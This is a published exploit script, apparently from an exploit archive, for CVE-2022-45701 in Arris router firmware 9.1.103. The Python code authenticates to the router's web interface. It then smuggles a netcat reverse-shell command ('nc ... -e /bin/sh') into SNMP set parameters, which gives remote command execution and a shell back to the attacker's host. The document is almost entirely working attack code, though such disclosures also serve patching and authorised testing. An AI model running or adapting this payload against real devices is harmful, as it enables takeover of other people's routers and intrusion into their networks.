Arris Router Firmware 9.1.103 Remote Code Execution

`c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)  
# Date: 17/11/2022  
# Exploit Author: Yerodin Richards  
# Vendor Homepage: https://www.commscope.com/  
# Version: 9.1.103  
# Tested on: TG2482A, TG2492, SBG10  
# CVE : CVE-2022-45701  
  
import requests  
import base64  
  
router_host = "http://192.168.0.1"  
username = "admin"  
password = "password"  
  
lhost = "192.168.0.6"  
lport = 80  
  
  
def main():  
print("Authorizing...")  
cookie = get_cookie(gen_header(username, password))  
if cookie == '':  
print("Failed to authorize")  
exit(-1)  
print("Generating Payload...")  
payload = gen_payload(lhost, lport)  
print("Sending Payload...")  
send_payload(payload, cookie)  
print("Done, check shell..")  
  
def gen_header(u, p):  
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")  
  
def no_encode_params(params):  
return "&".join("%s=%s" % (k,v) for k,v in params.items())  
  
def get_cookie(header):  
url = router_host+"/login"  
params = no_encode_params({"arg":header, "_n":1})  
resp=requests.get(url, params=params)  
return resp.content.decode('UTF-8')  
  
def set_oid(oid, cookie):  
url = router_host+"/snmpSet"  
params = no_encode_params({"oid":oid, "_n":1})  
cookies = {"credential":cookie}  
requests.get(url, params=params, cookies=cookies)  
  
def gen_payload(h, p):  
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"  
  
def send_payload(payload, cookie):  
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)  
set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)  
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)  
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)  
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)  
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)  
  
  
if __name__ == '__main__':  
main()  
`